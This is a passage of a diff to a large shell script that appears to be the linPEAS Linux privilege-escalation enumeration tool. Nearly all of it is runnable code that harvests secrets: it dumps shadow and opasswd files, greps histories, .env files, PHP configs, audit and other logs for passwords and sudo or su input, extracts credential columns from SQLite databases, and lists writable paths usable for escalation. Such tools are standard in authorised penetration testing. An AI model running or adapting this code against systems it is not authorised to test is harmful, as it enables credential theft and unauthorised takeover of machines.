"(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi ##-- IF) Read shadow files printf $Y"[+] "$GREEN"Can I read shadow files? ............. "$NC - if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi ##-- IF) Read opasswd file printf $Y"[+] "$GREEN"Can I read opasswd file? ............. "$NC - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" else echo_no fi ##-- IF) network-scripts printf $Y"[+] "$GREEN"Can I write in network-scripts? ...... "$NC - if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," - elif [ "`find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else echo_no fi @@ -2400,40 +2888,40 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Root files in home dirs printf $Y"[+] "$GREEN"Searching root files in home dirs (limit 30)\n"$NC - (find /home /Users -user root 2>/dev/null | head -n 30 | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found + (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found echo "" ##-- IF) Others files in my dirs if ! [ "$IAMROOT" ]; then printf $Y"[+] "$GREEN"Searching folders owned by me containing others files on it\n"$NC - (find / -type d -user "$USER" -d 1 -not -path "/proc/*" 2>/dev/null | while read d; do find "$d" -maxdepth 1 ! -user "$USER" -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" + (find / -type d -user "$USER" -d 1 -not -path "/proc/*" 2>/dev/null | while read d; do find "$d" -maxdepth 1 ! -user "$USER" -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi ##-- IF) Readable files belonging to root and not world readable if ! [ "$IAMROOT" ]; then printf $Y"[+] "$GREEN"Readable files belonging to root and readable by me but not world readable\n"$NC - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found echo "" fi ##-- IF) Modified interesting files into specific folders in the last 5mins printf $Y"[+] "$GREEN"Modified interesting files in the last 5mins (limit 100)\n"$NC - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | head -n 100 | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m," + find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," echo "" ##-- IF) Writable log files printf $Y"[+] "$GREEN"Writable log files (logrotten) (limit 100)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation\n"$NC logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeE" + lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=`find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100` printf "$logfind\n" | while read log; do if [ -w "$log" ] || [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found if [ "`echo \"$log\" | grep \"You_can_write_more_log_files_inside_last_directory\"`" ]; then printf $ITALIC"$log\n"$NC; - elif [ -w "$log" ] && [ "`which logrotate`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case elif [ -w "$log" ]; then echo "Writable: $log"; - elif [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m,g"; + elif [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g"; fi fi done @@ -2447,7 +2935,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Files inside /home printf $Y"[+] "$GREEN"Files inside others home (limit 20)\n"$NC - (find /home /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found + (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found echo "" ##-- IF) Mail applications @@ -2457,40 +2945,48 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Mails printf $Y"[+] "$GREEN"Mails (limit 50)\n"$NC - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f 2>/dev/null | head -n 50) || echo_not_found + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed "s,root,${C}[1;32m&${C}[0m,g") || echo_not_found + echo "" + + ##-- IF) Backup folders + printf $Y"[+] "$GREEN"Backup folders\n"$NC + printf "$backup_folders\n" | while read b ; do + ls -ld "$b" 2> /dev/null + ls -l "$b" 2>/dev/null && echo "" + done echo "" ##-- IF) Backup files - printf $Y"[+] "$GREEN"Backup files?\n"$NC + printf $Y"[+] "$GREEN"Backup files\n"$NC backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` printf "$backs\n" | while read b ; do if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | sed -E "s,backup|bck|\.bak|\.old,${C}[1;31m&${C}[0m,g"; + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${C}[1;31m&${C}[0m,g"; fi; done echo "" ##-- IF) DB files printf $Y"[+] "$GREEN"Searching tables inside readable .db/.sql/.sqlite files (limit 100)\n"$NC - dbfiles=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.db$|.*\.sqlite$|.*\.sqlite3$' | grep -E -v '/man/.*|/usr/.*|/var/cache/.*' | head -n 100) - FILECMD="`which file`" + dbfiles=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*\.db$|.*\.sqlite$|.*\.sqlite3$' | grep -E -v '/man/.*|/usr/.*|/var/cache/.*' | head -n 100) + FILECMD="`command -v file 2>/dev/null`" if [ "$dbfiles" ]; then printf "$dbfiles\n" | while read f; do if [ "$FILECMD" ]; then - echo "Found: `file \"$f\"`" | sed -E "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; else - echo "Found: $f" | sed -E "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; fi done SQLITEPYTHON="" printf "$dbfiles\n" | while read f; do if ([ -r "$f" ] && [ "$FILECMD" ] && [ "`file \"$f\" | grep -i sqlite`" ]) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "`which sqlite3 2>/dev/null`" ]; then + if [ "`command -v sqlite3 2>/dev/null`" ]; then tables=`sqlite3 $f ".tables" 2>/dev/null` #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" - elif [ "`which python 2>/dev/null`" ] || [ "`which python3 2>/dev/null`" ]; then - SQLITEPYTHON=`which python 2>/dev/null || which python3 2>/dev/null` + elif [ "`command -v python 2>/dev/null`" ] || [ "`command -v python3 2>/dev/null`" ]; then + SQLITEPYTHON=`command -v python 2>/dev/null || command -v python3 2>/dev/null` tables=`$SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null` #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" else @@ -2509,8 +3005,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then #Check found columns for interesting fields INTCOLUMN=`echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt"` if [ "$INTCOLUMN" ]; then - printf $B" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -E "s,user.*|credential.*,${C}[1;31m&${C}[0m,g" - printf "$columns\n" | sed -E "s,username|passw|credential|email|hash|salt|$t,${C}[1;31m&${C}[0m,g" + printf $B" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${C}[1;31m&${C}[0m,g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${C}[1;31m&${C}[0m,g" (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head fi done @@ -2530,27 +3026,35 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Interesting files - printf $Y"[+] "$GREEN"Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml\n"$NC + printf $Y"[+] "$GREEN"Readable hidden interesting files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data\n"$NC - fils=$(echo "$FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_MNT $FIND_VAR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*_history|\.sudo_as_admin_successful|\.profile|.*bashrc|.*httpd\.conf|.*\.plan|\.htpasswd|\.gitconfig|\.git-credentials|\.git|\.svn|\.rhosts|hosts\.equiv|Dockerfile|docker-compose\.yml') + fils=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_MNT\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '\.msmtprc|\.env|\.google_authenticator|\.recently-used.xbel|\.lesshst|.*_history|\.sudo_as_admin_successful|\.profile|.*bashrc|.*httpd\.conf|.*\.plan|\.htpasswd|\.gitconfig|\.git-credentials|\.git|\.svn|\.rhosts|hosts\.equiv') printf "$fils\n" | while read f; do if [ -r "$f" ]; then - ls -ld "$f" 2>/dev/null | sed "s,_history|\.sudo_as_admin_successful|.profile|bashrc|httpd.conf|\.plan|\.htpasswd|.gitconfig|\.git-credentials|.git|.svn|\.rhosts|hosts.equiv|Dockerfile|docker-compose.yml|\.viminfo|\.ldaprc,${C}[1;31m&${C}[0m," | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g"; + ls -ld "$f" 2>/dev/null | sed "s,\.msmtprc|\.env|.google_authenticator|_history|\.lesshst|.recently-used.xbel|\.sudo_as_admin_successful|.profile|bashrc|httpd.conf|\.plan|\.htpasswd|.gitconfig|\.git-credentials|.git|.svn|\.rhosts|hosts.equiv|\.ldaprc,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g"; if [ "`echo \"$f\" | grep \"_history\"`" ]; then printf $GREEN"Searching possible passwords inside $f (limit 100)\n"$NC - cat "$f" | grep -aE "$pwd_inside_history" | sed '/^.\{150\}./d' | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," | head -n 100 + cat "$f" | grep -aE "$pwd_inside_history" | sed '/^.\{150\}./d' | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," | head -n 100 echo "" elif [ "`echo \"$f\" | grep \"httpd.conf\"`" ]; then printf $GREEN"Checking for creds on $f\n"$NC - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" | grep -E "htaccess|htpasswd" | grep -v "^$" | sed -E "s,htaccess.*|htpasswd.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" | grep -E "htaccess|htpasswd" | grep -v "^$" | sed -${E} "s,htaccess.*|htpasswd.*,${C}[1;31m&${C}[0m," echo "" elif [ "`echo \"$f\" | grep \"htpasswd\"`" ]; then printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," echo "" elif [ "`echo \"$f\" | grep \"ldaprc\"`" ]; then printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "" + elif [ "`echo \"$f\" | grep \"\.env\"`" ]; then + printf $GREEN"Reading $f\n"$NC + cat "$f" | grep -v "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${C}[1;31m&${C}[0m," + echo "" + elif [ "`echo \"$f\" | grep \"\.msmtprc\"`" ]; then + printf $GREEN"Reading $f\n"$NC + cat "$f" | grep -v "^#" | sed -${E} "s,user.*|password.*,${C}[1;31m&${C}[0m," echo "" fi; fi; @@ -2559,12 +3063,12 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) All hidden files printf $Y"[+] "$GREEN"All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)\n"$NC - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -v "_history$|.sudo_as_admin_successful|\.profile|\.bashrc|\.plan|\.htpasswd|.gitconfig|\.git-credentials|\.rhosts|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|.depend|.placeholder|.gitkeep|.keep" | head -n 70 + find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -v "\.env|\.google_authenticator|_history$|\.recently-used.xbel|\.lesshst|.sudo_as_admin_successful|\.profile|\.bashrc|\.plan|\.htpasswd|.gitconfig|\.git-credentials|\.rhosts|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|.depend|.placeholder|.gitkeep|.keep" | head -n 70 echo "" - ##-- IF) Readable files in /tmp, /var/tmp, /var/backups - printf $Y"[+] "$GREEN"Readable files inside /tmp, /var/tmp, /var/backups, /private/tmp /private/var/at/tmp /private/var/tmp (limit 70)\n"$NC - filstmpback=`find /tmp /var/tmp /var/backups /private/tmp /private/var/at/tmp /private/var/tmp -type f 2>/dev/null | head -n 70` + ##-- IF) Readable files in /tmp, /var/tmp, bachups + printf $Y"[+] "$GREEN"Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)\n"$NC + filstmpback=`find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70` printf "$filstmpback\n" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done echo "" @@ -2573,13 +3077,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Interesting writable files owned by me or writable by everyone (not in Home) (max 500)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "10"){print "#)You_can_write_even_more_files_inside_last_directory"}; pre=act }' | head -n500` + obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` printf "$obmowbe\n" | while read entry; do if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then - echo "$entry" | sed -E "s,$writeVB,${C}[1;31;103m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m," else - echo "$entry" | sed -E "s,$writeB,${C}[1;31m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m," fi done echo "" @@ -2591,13 +3095,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC for g in `groups`; do printf " Group "$GREEN"$g:\n"$NC; - iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 10){ print line_init; } if (cont == "10"){print "#)You_can_write_even_more_files_inside_last_directory"}; pre=act }' | head -n500` + iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` printf "$iwfbg\n" | while read entry; do if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then - echo "$entry" | sed -E "s,$writeVB,${C}[1;31;103m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m," else - echo "$entry" | sed -E "s,$writeB,${C}[1;31m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m," fi done done @@ -2606,8 +3110,14 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Passwords in config PHP files printf $Y"[+] "$GREEN"Searching passwords in config PHP files\n"$NC - configs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*config.*\.php') - printf "$configs\n" | while read c; do grep -i "password.* = ['\"]\|define.*passw\|db_pass" $c 2>/dev/null | grep -v "function\|password.* = \"\"\|password.* = ''" | sed '/^.\{150\}./d' | sort | uniq | sed -E "s,[pP][aA][sS][sS][wW][oO][rR][dD]|[dD][bB]_[pP][aA][sS][sS],${C}[1;31m&${C}[0m,g"; done + configs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*config.*\.php|database.php|db.php|storage.php|settings.php') + printf "$configs\n" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${C}[1;31m&${C}[0m,g"; done + echo "" + + ##-- IF) TTY passwords + printf $Y"[+] "$GREEN"Checking for TTY (sudo/su) passwords in audit logs\n"$NC + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${C}[1;31m&${C}[0m,g" + grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${C}[1;31m&${C}[0m,g" | sed -${E} "s,data=.*,${C}[1;31m&${C}[0m,g" echo "" ##-- IF) IPs inside logs @@ -2617,44 +3127,51 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Passwords inside logs printf $Y"[+] "$GREEN"Finding passwords inside logs (limit 70)\n"$NC - (timeout 100 grep -R -i "pwd\|passw" /var/log/ /private/var/log) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -E "s,pwd|passw,${C}[1;31m&${C}[0m," + (timeout 100 grep -R -i "pwd\|passw" /var/log/ /private/var/log) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${C}[1;31m&${C}[0m," echo "" ##-- IF) Emails inside logs printf $Y"[+] "$GREEN"Finding emails inside logs (limit 70)\n"$NC - (timeout 100 grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" /var/log/ /private/var/log) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -E "s,$knw_emails,${C}[1;32m&${C}[0m,g" + (timeout 100 grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" /var/log/ /private/var/log) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${C}[1;32m&${C}[0m,g" echo "" ##-- IF) Passwords files in home printf $Y"[+] "$GREEN"Finding *password* or *credential* files in home (limit 70)\n"$NC - (echo "$FIND_HOME $FIND_ROOT $FIND_USERS" | grep -E '.*password.*|.*credential.*|creds.*' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " There are more creds/passwds files in the previous parent folder"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -E "s,password|credential,${C}[1;31m&${C}[0m," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[1;32m&${C}[0m,") || echo_not_found + (echo "$FIND_HOME $FIND_USR" | grep -E '.*password.*|.*credential.*|creds.*' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${C}[1;31m&${C}[0m," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords - printf $Y"[+] "$GREEN"Finding 'pwd' or 'passw' variables (and interesting php db definitions) inside key folders (limit 70)\n"$NC - timeout 120 grep -RiIE "(pwd|passwd|password).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" /home /var/www /var/backups /tmp /etc /root /mnt /Users /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | grep -iv "linpeas" | head -n 70 | sed -E "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" + printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - only PHP files\n"$NC + intpwdfiles=`timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /root /mnt /Users /private 2>/dev/null` + printf "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" + echo "" + + printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - no PHP files\n"$NC + printf "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" echo "" ##-- IF) Find possible files with passwords - printf $Y"[+] "$GREEN"Finding possible password variables inside key folders (limit 70)\n"$NC - timeout 120 grep -RiIE "($pwd_in_variables).*[=:].+" /home /var/www /var/backups /tmp 